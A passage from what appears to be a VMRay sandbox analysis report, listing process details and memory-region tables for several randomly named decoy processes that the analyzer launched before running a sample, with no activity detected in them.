| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa58 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D80
0x
870
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00733fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00740fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00751fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00760000 | 0x0081dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00893fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x00ce7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00f37fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| advertisement-beginners.exe | 0x01290000 | 0x012a6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000012b0000 | 0x012b0000 | 0x026affff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f460000 | 0x7f460000 | 0x7f55ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f560000 | 0x7f560000 | 0x7f582fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f585000 | 0x7f585000 | 0x7f587fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f58b000 | 0x7f58b000 | 0x7f58dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f58e000 | 0x7f58e000 | 0x7f58efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f58f000 | 0x7f58f000 | 0x7f58ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #85: semiconductorphysfisheries.exe
0
0
| Information | Value |
|---|---|
| ID | #85 |
| File Name | c:\program files\common files\semiconductorphysfisheries.exe |
| Command Line | "C:\Program Files\Common Files\semiconductorphysfisheries.exe" |
| Initial Working Directory | C:\Program Files\Common Files\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x68c |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D7C
0x
A7C
0x
128
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| semiconductorphysfisheries.exe | 0x00bd0000 | 0x00be6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000dd0000 | 0x00dd0000 | 0x00ddffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00df0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e00000 | 0x00e00000 | 0x00e13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f60000 | 0x00f60000 | 0x00f63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00f81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fe0000 | 0x00fe0000 | 0x00fe0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x00ff3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001000000 | 0x01000000 | 0x01004fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x01013fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001030000 | 0x01030000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01140000 | 0x011fdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01487fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001490000 | 0x01490000 | 0x01610fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001620000 | 0x01620000 | 0x02a1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002a20000 | 0x02a20000 | 0x02ad7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02ccffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f8a0000 | 0x7f8a0000 | 0x7f99ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f9a0000 | 0x7f9a0000 | 0x7f9c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f9c5000 | 0x7f9c5000 | 0x7f9c7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9c8000 | 0x7f9c8000 | 0x7f9c8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9cc000 | 0x7f9cc000 | 0x7f9ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f9cd000 | 0x7f9cd000 | 0x7f9cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #86: medicare.exe
0
0
| Information | Value |
|---|---|
| ID | #86 |
| File Name | c:\program files (x86)\mozilla firefox\medicare.exe |
| Command Line | "C:\Program Files (x86)\Mozilla Firefox\medicare.exe" |
| Initial Working Directory | C:\Program Files (x86)\Mozilla Firefox\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7b8 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D78
0x
534
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e60fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x00fd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00fe0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x01040fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x01053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001060000 | 0x01060000 | 0x01064fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001070000 | 0x01070000 | 0x01073fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010b0000 | 0x010b0000 | 0x010bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x010c0000 | 0x0117dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001180000 | 0x01180000 | 0x01237fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0133ffff | Private Memory | rw |
|
|
|
- |
| medicare.exe | 0x01350000 | 0x01366fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001470000 | 0x01470000 | 0x015f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001600000 | 0x01600000 | 0x01780fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001790000 | 0x01790000 | 0x017cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000017f0000 | 0x017f0000 | 0x017fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001800000 | 0x01800000 | 0x02bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e960000 | 0x7e960000 | 0x7ea5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea60000 | 0x7ea60000 | 0x7ea82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea85000 | 0x7ea85000 | 0x7ea87fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea8b000 | 0x7ea8b000 | 0x7ea8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea8c000 | 0x7ea8c000 | 0x7ea8efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea8f000 | 0x7ea8f000 | 0x7ea8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #87: spain-chart.exe
0
0
| Information | Value |
|---|---|
| ID | #87 |
| File Name | c:\program files (x86)\google\spain-chart.exe |
| Command Line | "C:\Program Files (x86)\Google\spain-chart.exe" |
| Initial Working Directory | C:\Program Files (x86)\Google\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x55c |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D74
0x
AD0
0x
AF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x004d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00503fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x00653fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x00660fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x00671fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00680000 | 0x0073dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00740fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x007b4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| spain-chart.exe | 0x00930000 | 0x00946fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00bd7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x00c97fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00e40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x0224ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0234ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fca0000 | 0x7fca0000 | 0x7fd9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fda0000 | 0x7fda0000 | 0x7fdc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fdc5000 | 0x7fdc5000 | 0x7fdc7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fdcb000 | 0x7fdcb000 | 0x7fdcdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fdce000 | 0x7fdce000 | 0x7fdcefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fdcf000 | 0x7fdcf000 | 0x7fdcffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #88: females-ward.exe
0
0
| Information | Value |
|---|---|
| ID | #88 |
| File Name | c:\program files\microsoft office\females-ward.exe |
| Command Line | "C:\Program Files\Microsoft Office\females-ward.exe" |
| Initial Working Directory | C:\Program Files\Microsoft Office\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3dc |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D70
0x
C08
0x
C04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| females-ward.exe | 0x00880000 | 0x00896fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c80000 | 0x00c80000 | 0x00c8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00c93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00ca0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e10000 | 0x00e10000 | 0x00e13fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e20000 | 0x00e20000 | 0x00e20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e8ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e90000 | 0x00f4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f70000 | 0x00f70000 | 0x00f73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f80000 | 0x00f80000 | 0x00f84fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x00f93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x01357fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001360000 | 0x01360000 | 0x014e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000014f0000 | 0x014f0000 | 0x028effff | Pagefile Backed Memory | r |
|
|
|
- |
